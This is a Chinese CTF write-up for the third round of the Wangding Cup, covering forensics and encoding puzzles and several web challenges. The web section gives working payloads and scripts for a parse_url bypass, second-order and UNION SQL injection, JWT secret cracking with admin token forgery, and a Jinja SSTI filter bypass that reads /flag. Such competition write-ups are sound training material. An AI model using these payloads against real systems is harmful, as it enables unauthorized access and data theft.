“网鼎杯”第三场Write up

MISC

Not_only_base

栅栏
图片.png
BASE32
图片.png

track_hacker

过滤http流,可以看到上传了一个shell。
图片.png
这个shell一共执行了4次
图片.png
可以在最后一次的请求包中找到cat /flag.txt
图片.png
将压缩过的结果进行解密
图片.png

dewas

hint:经常玩fps? (flag加上flag{})

ddssdssdssdssdssdssdswdwwdwwdwwdwwddssdssdssdssdswdwwdwwdwwdwwdwwdwwdedsssssssssssssedwdwwdwwdwwdwwdwwdwwddssdssdssdsaaaaaaaaddddddddsdssdssdsdedwwwedsddsdddsddddwdddwddwwawaaawaaawaaawaaawadwdwwdddwdddsdddsddsedddddwwwessssssssssssssddddwdddwddwddwddwdwwdwawwaawaawaawaaawaaaaeddddddddddddddddddesssssssssssssseddddddewwwwwwwwwwwwwwdssdssdssdssdssdssdssdwwwwwwwwwwwwwweddddddddddddddssssssewwawwawawaaasasassasssassdsssdsddsddddwdwwdwwwaaaeddddddssssssewdwdwdwdwdwdwdawawawawawawaweddddddddddeddddddddaaaaaaaasssssssddddddaaaaaassssssseddddddddddddwwwwwwwwwwwwwwessssssssssdssdsddsdddwddwdwwdwwwwwwwwwwedddddssssssssssssssewwwwwwwwwwwwwwdssdssdssdssdssdssdssdwwwwwwwwwwwwwwedddddesssssssssesssess

根据题中提示FPS推断WASD键为方向 E为断点 画图得到flag
画的太丑了,后面的就不画了
图片.png

mirror

hint:mirror refection
根据提示发现文件尾有倒置的PNG文件头
图片.png
搜索DNEI关键字找到PNG文件尾
图片.png
写个脚本将png文件数据倒置并保存得到flag图片

a="444E454900000000433D5706B1867D0E03FF022D9022808AA0EBB02F2BC6A020BC81140457F6A08B6578D4045B2045011541D7605E578D404179022808AFED4116CAF1A808B6408A022A83AEC0BCAF1A8082F20450115FDA822D95E350116C81140455075D81795E350105E408A022BFB5045B2BC6A022D9022808AA0EBB02F2BC6A020BC81140450115DDAFECB2E502259022808AA8EBDACFCAF3D53F41FB8107E408A02292BF4488E37324D89C579EAF204725022808AFE75095D87AF3D5E444EDF33F492FCCBF77E3A0FF7EC3CDBFB958782EB25732FCFFE5156F5CC4878CF08576C17C9D85EA726383B58970DC685C1C3BE2858B46B41FC35A58D85534AF4AB57C3310BC2789EF5FC849FA497E65FBBF1D07811C295E5708E336F1D063DED92CBF09187CA39BC63F2126CBEFE5637FF0800EF93AA7B01D25DF3C98A138AF1BA973992537526CD97912A9F231E7C9FA839F5FBCF20DF069F5494839861D3DF3B996E492FC4F9AE6C8E45890C1FD84B237D94F001CFE9A56E124A442F39E12BA72F99665D2CB34F07EF15E7C9B4A6A1F83EC2F96B4E5B4BF36400629E1F0F8E36524A924DB6B513981D25F617F52CBAE778C22FB822C713F569DA79F0D638617E6937D6A2FCD5CDF093EA933FBFD7839DCC895E752E974B7C92515CB283CC7620BD398281B53E13595958E77D6F24286DE216109371E21FC9613C39B91CBCB8BA5D2EF46C2E3414067C9AA25C753A9D5AFCD8A7FD494E14638F7CE673D9BF02239FC87E49235A3F9986C3E1DF5BC1F27C3F8C5009DFD71A537C1BD8458F7DE95CAD5661BC6F77FEAE27C49424649086F10B0845437E0217DB66B924B000416978A1A8CEBBEEF059B2793C9B2BC3B46237FF74492E4B0BF6FB48F02C4983E2056E48BB9C8B45A2CBA450651CE98B462F73F825C0DDA039B2E4393F4715D427D221DF095C0F3AC1DFA1C05387E6E3BC1B9CD2DF069F5499FDFE2A784362DE63C24F938D79A51E15305CEF593BBC1B8125C9AD628182384882AD4FD01E1591EE215F028E7C907E7227E98C4EB0465E4F1854F58B7FD34B287C618373045E5E58C27B9BC1B90D8563CC58C40A2AA49FD61FE5B21EF22E1EF86CDC08BC27F92503096CB288EE488D8878C91F8F19294494FE8B0D72F1BF0B3C153BE5A4E173C6B09242C04924C74A3604A2A9EAEE4905A306F0D9863C6F39AE178C4E51596CE86078C8789F84CC8A7E8D3E76F0BB4881322268BCC53782C17BEB2BAFEBE20D7FC7D2F5499FDFE4216520A6945DFFFC49F7FD590FE457272F1DDAF45569914B8FE3CEB84625E11A55C5471381C341CFEC14A4A7900862DBFA42783316F26E62F39197F3C6C3FD71207A0FE402BC202B086B09EAE3ED6140DFECF349B60A14E57143A9E162411778F09CBA9CF8B0CA143924584421D86C4FEBB9CEE773A19947C58E16F197CD9CF04843805C7840AE2AF1B528ACB67445D0837BD6C1CF0A7E9C5F990722EFEFF5FA85B3921DE71ECF7BBEB84FD84AF07D4AFAD44E327E76C9B4BE1C4FA5EA933FB794EA753A17BBC4FEC92D241A6DDFF00C58C2ECDE6D368715323DC0FDFE426C308714369FE84A8F0483932DA4E361362C72B95CAFF5C5FAD45184CDE31E1769FA7A3F319E67D7762123DE83D946E42423C2F39014461AF7FFAA26EEC156AB55BA86332E708C4623A178BD5479B069A7FC81B0DC251AF264232EB75BAC6A72E52BBD8A48341A0D94DCDBAE773B9A1765120610AB35E5777D7EBF5E6BAEF77BB9A4E193A9DCEC058A4C48A078A20EE5C6196972D7D72ED2C7A02CFD4110D0783A1CCD369B4FFA5B4A7E945F9FE76906CBC9C8C21A2EFBFEF07EBB08E457D6697E76CDF0E23197AA4D03CF6EF767B7E5ABC4FEFF21A5C5E19AF15CAE573EB2BA49B49E323C84C724E4F0A03885FC60B2095C926182630F060FE120AED831280E67BA1B0D86BF37810061CBE0A4F11B0E7EBF5FBFD717EB712E6485CD389C04CF3B5BADD6B51AC1D4FD293934F083F0D1C9EEE26DFDFD51AE6F0978CE43A1D0E6BDDEEF663BCEFB9F64E2129B3D54639C10097946183CA3D4B0A77C378E306D0870F16D238AFDB538F460FBCD8768C3000F1380CE4B5833DDEEF75F85CF0016204AE418849E2882761BF45D9CF3CD89F09215A73C8D5E0E8C534E8A9FD78D629ACBC0F5B6A0E713F492FCCAB8CA53255AAE566C1E0F2F1ED23F349BEB497E76CDF0E2ED3D52509D0731ACC8A0DB7EDF539FD93E4929F85ACB61D145FD4BD6419B88B06F674233E3F1F8CFF6E3399CCEFD0868AC562A7FB07F7FAB9E73D5EAF5FE848A315CF58167EF08C5505C31F1BC6F9BFE7D8AB5BFBEF5AD7FCC5E0341ED6FEC1AD1BFE3B7BBDDECBBCE359ACD6B0616612FEB8BF59A755ED7F5FFDF119E46A351A6EBFAFB7E9F8C5E258C4F0AE923917F525828A52858EDEDB49C4578A48410AB1FFF549229C663B1D8E8CB9B7CDD5E75B6DB6D9E845E16C53E2AFF1DEDF6E3F5E35B17C9B002FF60559B75D0838677379BCD331D8EC76004FCED0E9C89057A7198D63E9ABB5DAE9B67B3D99AB9B65EE36073DF8F87455A1A66DB6DB7B14E63D8F63D0E2CB5D67D9976BB5DE06ED13189DCBE5F2D78D626E8CA603CBF4EF2F97CB3F4A2FCE086A204064E707C39783844C7E6937D692FCED9BE127D52478F25D2E97AE64FEE0BE4926E7BBCEFBBFB7E57BAFD7EBDBD0BB1F6ABDF9E1EB04C8F6F2D56AB518A1D80094C16C3106A90FAC3FBE06BADAF42E170B353F4F93F3C62877842F5E0DAC9E3738DC6E38E312C6B11F1ACAC27B10CADE1187F525FAD2595EAAD56AABC6330C286F2DEB787F18C8C9E0D86E36FCCE317461DBCDA7FAA29F888C215CC8B84373FCFB3EB18BC3D545ABCBCF7BDE8B84A786A351A9BCFE7F399369BCDC346478670F87238F0BA84312C964B0A9CA6BC0D0683479E19DE155C6D369B4B2263120AE18FE0CD5F57A8CD178BC5CD57ABD5CCD76BB5C63714CA6535B842678674FA7D3874FAB7EE26A2E90CD9F67F3F5E787EEF3FCF97E5106EF38B65BAD9C5AC6DCD95127CD56AB54D4E024E2FEA92EDD59BFBF3B4DF5A88ABEF0A46F8173EB048318F722B75BADDF2B8A21C8D1F4783F85DA536D0DD6EB75305C2E1710A28FFFF4A071B8DC686C20781660CFF6D2FD6A3A18C95E57EBF363F8F93E691C8CDF99DAED76DEBD613988E47C3980E0703EB1C97A5F17D46C32F57ABD36773B9D356EB75B34EE773B1E05C9704687E1FA598C663319A9B4DA6D03C0F19C0B05C2EDAED733709B901948F0F87C368038AB40C72A84EE773B992A954AA2D2F13302C67B9AF6BCC6EC0CF4FA7D334BF2FFAD70C2F1A5F777DDAFB9C147D08D77153DEB7EDF9DA6DA5F5A8E7B08C706F8173EB06B282FC2789CDD6EB75F238A3FBFCFC5A865C60D8C427BB6ADF8265572FC612EB61FE1CF379FCED8A10984FC6681C0E2F2C1CAEC27C2FEDA5FAD44DCBD5EBEDF4FA6B3D9ECF0A6C6F0EC763FD95EA1D0D5F9A8F47A3BBD815EECB65B2FD36575EF1C1642F0BFFA6B1D8EC66C3F9B91F47F973186E2CCABDFD7BD7EB75B0186C783F87D77EFF6FB368F47A330542A1536AF579FE201A023154AA5532BEAFCECF8C4B46103E35A7A6FAE795E9ACD66A6EAF57AA6168B45A6956A6E71E1B8DC6E6DBEDF6E666B359AA15ABFAF3CA9363A7388E45F17CBF9A673399B71D2D96CB4D6BB5B3F0A8E682A1BEB51BE1597D586D9D0FCFE6F3966E89C4D260D043C8289FEDA7983F5B0A06EC72F974B989A4D26983A1D8EBF22759AE6371B0DCB1C7D3EDF535CFF4362F160F98060381BE1838D6290C87979B8FC7E3EF1D37CDFEFD20009952ACD66B3309C4EBFFDDDCDE6C9E6A9D4EA741392693899A6F379BD04E198CC66712FFB491F3CF997B7DBED99F6FBBD9B6BB53A9946A35181160781153956C450A2B158ACD2793C9CD3D9ECF4C3D1E8F4102850A81140456854D9720ABC6A02241408A02280F74BC6A022808AD0A9B2E41578D404482811404501EE978D40450115A15365C82AF1A808905022808A03DD2F1A808A022B42A6CB9055E3501120A045011407BA5E3501140456854D9720ABC6A02241408A02280F74BC6A022808AD0A9B2E41578D4044828114045046E978D4043808A022808AB8AAF260572810C0A0450114045251AFFC9E6D87E47DC9CEB5AF6B5EF77F6BDAC7ECE73DDF92B58FCFEF77EFEF75E7A77E71D773D9FD9990E841065141048C8487F0C59E2A4D78C8484E874ED118EDA47A9496D147F141111504C2531DA675434653064A969578ED1D306A3061A9A87F18F50EF52AF55E253177C716574FAC7B9CED017854414449EA0B0000EAB3EE120A3E6174656D706D783A782F3C0A3E4644523A6664722F3C2020200A3E6E6F6974706972637365443A6664722F3C2020202020200A3E6E6F69736E656D6944596C657869503A666978652F3C31343E6E6F69736E656D6944596C657869503A666978653C2020202020202020200A3E6E6F69736E656D6944586C657869503A666978652F3C3330333E6E6F69736E656D6944586C657869503A666978653C2020202020202020200A3E222F302E312F666978652F6D6F632E65626F64612E736E2F2F3A70747468223D666978653A736E6C6D782020202020202020202020200A22223D74756F62613A666472206E6F6974706972637365443A6664723C2020202020200A3E2223736E2D7861746E79732D6664722D32322F32302F393939312F67726F2E33772E7777772F2F3A70747468223D6664723A736E6C6D78204644523A6664723C2020200A3E22302E342E352065726F4320504D58223D6B74706D783A7820222F6174656D3A736E3A65626F6461223D783A736E6C6D78206174656D706D783A783C0000000000706D782E65626F64612E6D6F633A4C4D58745854699C01000014A6CA28B010F79E1FE45FE0758F0CCDC8487DADA11E800474A213F2F54C3EDA007DEC52355BFC7C79AC7C7C7FADF00399C47FA43BF8F8E949AD233522C54FD83B24914FFAE41C1D801794688E1A222A322D2D13BDC6450AF5A26002F3A8009C527BBEA9E27FC092603FEA68149EA7AA60B882BE915000F128001ADBC00C9C9C28850056C9ECC5B1171F18CF1C3FBF83DFAD6FF337D96BEE2BECB636797EC4BF3B9F199FB54FCD27C163EC61F190FE3E8F868FB7DE73F79ABBE69DE8B6FE337E237A191B891AECFEBD3FC9F5ECDAF3D8FF943FFCABD8E5E8A5E862F058BCF70FFB0CCFCFF6E7BAB3DE99F4B4F294F7943AFF7E4BBF97C19C830793E449EBA077C0767649CCA35BFE66FE571FB58FA547A523C161E621EEB07B1FDF67EE6F7BF4BDF9F77B97765FB0BFDBB9DF44EF7BB779EDFAEB758B7CBCDEFA6E177D9E7D73DEDCEF6B4F4B8F4B46F9C374DDD4EDD53D7F1D5FA9D76397537AE9DD7CD6B8C6BE9EAF5D573395FB8AFE79D993B17CBFF65CAE97C14BEE8EFCC756F17718B83FB497DB0617290BABDB5136D1F9CE7CFC6E77973C473E2D9DAACE2A67FA339A97FAC5FA9EB5BAB7B74E83A7BD2DF12D659BF3348D34569A82682A9EA29CF727C6938689C609FB78F83C73BE7F139F8BD8F498E063C2C6B48D0386AB0696D1EFA8E7A478591F0FD697AE1EB8B87DAC3BABAE73A8EDA88DAB235846ADFD585D55AD575438C43CEAA98AAD3E0FB307B107A59526954D038081EEE9F824FCBFFB85FD9D7EC35F6BCFB7DBDDCBDC7CF79B3DED1EE345778576FCBF396BFBBADEED1B765ACA42CAC97749771177FBA539D2D5E764B9DFBC760A3BE83B4DEDD0F6E0C94E4972896D5B73CDB3BD6E156EC56DF78A9D8BBA5BC92DF1C7ECB1FBB47ED745388B5F85A585B6856B82DC05EFE6F779B0ECDEE87E083FD01FFED36DC9BFDF9C5F215F3EB1B018DC1BCBADE4E9E6B437621BF7DC92DCDB5CD7FEB69F5C4F5DABAC05D6876B79B5C35AFB4D6926B40D607D5CCD581AAFD6ABFA55F6CACE4AF44AD0E73FC72CF15E6C562C2B5DE5C2E5E572C4ECB3165A7F6457647B640E946E933525D47348AA592D248B24812D5C583888E973BA5D752D922F9452C8AF667973375323B09A611542D38CC48CF8198DE9B1E9E369356961698FD4FEEA606A4DE0B9411F0257FCA5F93DF30CA7B653DC53CFC925C9EEC967BC2579DCF30EE0EEE2F5C979C5D9C3E3846927B49589347B257630ECAFC4E1E26C624C4489C97B097144BB3E2FA716B58BABA2F968BA6459DE17F30B8E85A182E760B7E05D184EA849884B8092DF105E2B5E3D771D5B89B38B2B125B1BEB18F98BA98C2CC628C7B746968B36883D47154779443F23879125C8D4919D115588BB08D3FE62BF3E1F9D8F997FC34BE1A6E147B0F6D85630818735E709E78CF387D0F6E8506870A1AD21C4422C424FC1E5C191C1C9823A83AB41CE412358EAB0E2C3A59FB02DB81C1813102DA032B018E0123FEF5FE29FE06FEC7BF72BF68BF153F6EDF02DF00DF28BE6D3ED59F571F47F794FBD8B7ADB7B5F308F32A66734C67AF6AAF5C5E865E27CF4ACF6C9EFA9E643C9F8F448F741E65DC07EED9DC0DDD077355B9BCB9D35CF9EDD876E696E566E9FEBB8F5CB35C9D5D9F2E33975ACBB78B8C1715C6228CE1195433F738F79D139C8D9D869C1A9D893B3939BF1DDB1C9B8EA18EA91D7739BECE6F0E72C73378716875AC3BF838A072DFD857D8E7B0B7B5BDDAB5DAE5D905D8A9D81F6CAB6DD36D1D6DDF369D366D9B049B231B6BF5B375AE7588759A6B01AB7AAB6CAB4C56C8ADFBB395D9C2D9976CCC6CEF65AF72C0A593A5B0961B8B0A8B7C168E16C058F79AF7CCD3CC339AC732DD9A559A96CD3CCC519A1F4DEB4C734CB2986A9B9E4D9A4C9B26B126A6268FE34EE32EF1BE630CC6098DF746F54655A350A33D2311C376C30EE1B26186434486478346835C836883530331FD6EFD01FEA97D40FD6D7D11F41DE8CBD3A7A4CE8D5D05EF5E77A1DBD027A1E7AA8F58774E7BA1DDD54DD2F5D34BA579D45CEB767488E804EAE8EA8F69776A0FB52BDA11DA16DAC36BEEB3E3ACC15667166DCB3AA59ABD692EB4FB5A65AD7CD68596B42D23E6B3669B734D334FD35D268BE35B71A8D1A051A7834BC34B31A8FF53EF506F566FA9E754CEA3AEA2FB43BB4E3B4C569D2D16342668A1A326AB3B50AB572DA8C5A8E6D454D44755BB5547AA85AAA9AA59554D5562A90EA25EA2AD40DD43950FAA435451520CAA2E55072A792AB854FC544C54E0AB9F9557CAC3E522E50CE530E53B6554CAA34AFD4AD3A50AA51AD2B6251F251325044A57C50DE284F154B1473158B8A99158D14122B5E14FA149A142A156B0AB814B02B582AA0527CA63CA45CA3A942D945928125178A13142851DF91EF91B721AE42DE4A5921790FB20B642AC99F480690AE918E919523AD20249F3485C901922448EF890F8897881B119627AE254C45189DD129A26544630886106E12B422A84C5082B097023084AE098C1128231F867F87DF0E7F187F14BE2E7C42F013E3FBC7B787AF093C27DC21B87D71E7704771BB71F2E165C6C70C2E3B9C4B389A70E1C51D883B17B61B6C46D8BDD845B12BB15363C6C40D8CEB14D61A58B1603E610CC6DCC25CC29CC6A98A531F2619660A4C38985862B8C4B18DA3050C77F411E803D137D03BA13745AE8E5D08BA0D7A297A0E68D1D103A1BB42B68E9A2A68B1A33EA15EA19289BA89D515AA03544AA8A5500AA0D6A3128C95012A18541F2818A15947D2868A1228028A3C25F832C36F875F00BE09B811F095C19702DE0F381CE14BC0A7045E0A3860E13301981B604D81D6155864C14605F42DE861A00683DD0BD42AE805D0D3A19FA0EA801D0E54095085403682AD0A484240A508943C5011408507E407901887B212C86320F484D2151028838410418C01F011825E043032003C1B701E83AE0CB802E03383341C7051C16A08383F60E504EC15B04283E41EB02AC0CB06200C83E00E03160F102881840838A90BC06E0273EA42B019810C0BA04D02A811408803004EB89B653D9C548E1CB3801DFC500087C66C670CD497641680113B1B199A810EB9C001ECCB633F0D108BBC9DDDDE24753B3B8980031DADBDBA6CF58E4259D1E32DC899D167E1482C42B45327C0A3389F2DE2CDAA4510EC08E07B03441D0F20840FC0BE0669F0A0ECA987BE5C3733390390B373E523B24BB7201E979FDCB87A512E796F2CA2FEE5A27C66FD7CF2E36BC9C494C4CE64279FA99ECED7CA0547E2CDCF92C057ACBF9219ED7CBFAF267BC0309E7EBC846962EDC8F8F8CF0645A49669BCCC416CE69D8A8FC39F8F258F3E76E5A2D34AF2678B6669CC3EC592B9E423338B34E45F893CCD35158B271E4B3F8164E6990BCFA6E7CB06FB65CCD3093E247334F460697CC93FE93B80B34D85E6930B3960CCB4DDD9EC86919023038BE64A209873A74BA464B7FE3B73FF8AF674A2240AFBC14996B53CE453B364C7924CC5BF949C4BFA4B3610CB04E646467660BC91845CD9F0E0F03BC8C22102B90ADB08BEC87120A4E6CF4EC42364000A716CD993C00035841F08A89F49E8D192693826478A6538270FC22052315561057C1344B2CB86EC42AA80016712239AFA224F840C9C25712708E140003849E5CCA2AFFF7FBFD6226AD378C4D001DC3E5DFE3D3220043C3C33111239B3C0258F23202C009EE3A04F8B8F4DE0111C4B30864004AC3A5122D9E0A000F3AD77BAEF739CF73BCEFDDD675BCFF5FFFF5FFE6613E03FE54360B071D4541904FB0580830B1444163200B1C144522232C11151446047111D8A821310942409211B07482287A1290040BA4DE84A4508168DE97BEF4016D9535407979589480000656C69666F72502043434950434369C40A000071AFF0640000000608290000002F010000524448490D0000000A1A0A0D474E5089"
b=""
for i in range(0,len(a),2):
    b+=a[len(a)-i-2:len(a)-i]

with open('flag.txt','wb') as f:
    f.write(b.encode())

图片.png

Unpleasant_music

WEB

comein

由于运维人员失误,内网认证页面部署至了外网,不过还好,开发加了域名验证。
图片.png
源码
图片.png

// php解析url,返回其组成部分,函数:parse_url()

URL: http://username:password@hostname/path?arg=value#anchor

var_dump(parse_url($url));  
array(7) {
  ["scheme"]=>
  string(4) "http"
  ["host"]=>
  string(8) "hostname"
  ["user"]=>
  string(8) "username"
  ["pass"]=>
  string(8) "password"
  ["path"]=>
  string(5) "/path"
  ["query"]=>
  string(9) "arg=value"
  ["fragment"]=>
  string(6) "anchor"
}

print_r(parse_url($url));
Array
(
    [scheme] => http
    [host] => hostname
    [user] => username
    [pass] => password
    [path] => /path
    [query] => arg=value
    [fragment] => anchor
)

考察 parse_urlstripos函数绕过,.在第一位时返回0得到的是false于是便可绕过stripos,apche和parse-url对URL解析存在差异,127.0.0.1..@alien.somewhere.meepwn.team/在apache看来是个目录,在parse_url看来是个域名。所以后面需要加上..//index.php
payload:.@c7f.zhuque.com/..//index.php
参考文章:https://ctftime.org/writeup/10429?tdsourcetag=s_pctim_aiomsg
http://skysec.top/2017/12/15/parse-url%E5%87%BD%E6%95%B0%E5%B0%8F%E8%AE%B0/
http://pupiles.com/%E8%B0%88%E8%B0%88parse_url.html

phone

这是一个二次注入,在用户注册处的电话处存在二次注入,phone只能为数字,用0x绕过。做的时候用的时间盲注或者布尔盲注做的,payload:1231312' or if(ascii(substr(database(),1,1))=98,1,False)#如果后面的ascii值为真返回1,则该手机号与所有手机号比较都相等。否则都不相等。
TIM图片20180830171131.png
图片.png
我写了一个注册脚本,一个查询脚本。先注册几千个带有注入语句的手机号,然后用查询脚本一个个登陆查询。
注册脚本

# -*- coding:utf8 -*-
import requests
import binascii
db_name=""
url1= "http://d8b2f5b882744df6af021400cc00974e2926ad42f4084dfa.game.ichunqiu.com/register.php"
database=""
name=90000
##当前数据库名长度##
for a in range(1,32):
   for i in range(40,127):
        payload="122222222222222' or if(ascii(substr((select f14g from flag),%d,1))=%d,1,False) #"%(a,i)
        db_payload=binascii.b2a_hex(payload.encode("utf8")).decode("utf8")
        db_payload="0x"+db_payload
        name=name+1
        print(name)
        print(payload)
        da={"username":name,
            "password":123,
            "phone":db_payload
            }
        r=requests.post(url1,data=da)

查询脚本

# -*- coding:utf8 -*-
import requests
import time
db_name=""
url1= "http://d8b2f5b882744df6af021400cc00974e2926ad42f4084dfa.game.ichunqiu.com/login.php"
url3="http://d8b2f5b882744df6af021400cc00974e2926ad42f4084dfa.game.ichunqiu.com/query.php"
name=90000
##当前数据库名长度##
for a in range(1,32):
   for i in range(40,127):
        name=name+1
        da={"username":name,
            "password":123,
            }
        r=requests.post(url1,data=da)
        cook=r.cookies
        n=requests.post(url3,cookies=cook)
        print(n.text)
        if "0" not in n.text:
            db_name+=chr(i)
            print(db_name)
            break

比赛后看了wp才发现可以直接用union select注入,很崩溃。
获取表名
aaa' union select group_concat(table_name) from information_schema.tables where table_schema=database() order by 1 desc#
图片.png
获取列名
aaa' union select group_concat(column_name) from information_schema.columns where table_name="flag" order by 1 desc#
图片.png
获取字段
aaa' union select f14g from flag#
图片.png
注意要加上要加上order by 1 desc,因为union查询到了两个数据,一个0一个flag。
图片.png

gold

还在上小学的小明同学开发了一款游戏,你能通关吗?
图片.png
Burpsuite 抓包会发现浏览器一直发送POST数据,应该是通过Ajax来发起请求的:
图片.png
根据题目提示: 收集1000金币即可过关 。尝试直接将参数 getGod 的值修改为1000,发现会触发检测机制。
图片.png
直接用getGod参数来进行爆破。每次增加1金币爆破到一半总触发检测机制,我就用每次增加五金币,到1005得到flag。
图片.png

i_am_admin

一篇文章告诉你JWT的实现原理
抓取登陆数据包发现JWT
图片.png
登录进去可以发现用于加密的 secret key
使用这个 secret keyhttps://jwt.io/ 生成 admin 对应的 token
图片.png
使用该 token 值访问网站即可获得flag:
图片.png

mmmmy

抓包发现这里又使用了JWT

并且只有admin可以留言,爆破secret
图片.png
然后伪造身份成为admin
图片.png
图片.png
输入的东西都会原原本本地打印在页面上,于是猜测这是一个SSTI。过滤了' " os _ {{
这里过滤了{{,其实还可以使用{%,比如 {% if 1 %}1{%endif%},会打印1
图片.png
payload:text={% if open('/flag','r').read()[0]=='f' %}1{% else %}0{% endif %}
过滤了单、双引号,我们可以使用以下payload进行绕过:
text={% if request.values.e[18] == ()[request.values.a][request.values.b][request.values.c]()[40](request.values.d).read()[0]%}good{%endif%}&a=__class__&b=__base__&c=__subclasses__&d=/flag&e=}-{0123456789abcdefghijklmnopqrstuvwxyz
getflag.py

import requests,sys
url = "http://4532bc69bc734acd8416204f0aa04f446e9d38024c5644e8.game.ichunqiu.com/bbs"
cookie = {
    "token" : "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIn0.IXEkNe82X4vypUsNeRFbhbXU4KE4winxIhrPiWpOP30"
}
chars = "}-{0123456789abcdefghijklmnopqrstuvwxyz"
flag = ''
for i in range(0,50):
    for j in range(0,len(chars)):
        data = {
            "text" : "{%% if request.values.e[%d] == ()[request.values.a][request.values.b][request.values.c]()[40](request.values.d).read()[%d]%%}getflag{%%endif%%}" % (j,i),
            "a" : "__class__",
            "b" : "__base__",
            "c" : "__subclasses__",
            "d" : "/flag",
            "e" : chars
        }
        r = requests.post(url=url,data=data,cookies=cookie)
        if 'getflag' in r.text:
            flag += chars[j]
            sys.stdout.write("[+] "+ flag + '\r')
            sys.stdout.flush()
            if chars[j] == '}':
                print(flag)
                exit()
            else:
                break
print(len(r.text))

图片.png

参考文章

https://xz.aliyun.com/t/2648#toc-5

网鼎杯第三场wp


https://qvq.im/archive/%E7%BD%91%E9%BC%8E%E6%9D%AF%E7%AC%AC%E4%B8%89%E5%9C%BA%20mmmmy%20writeup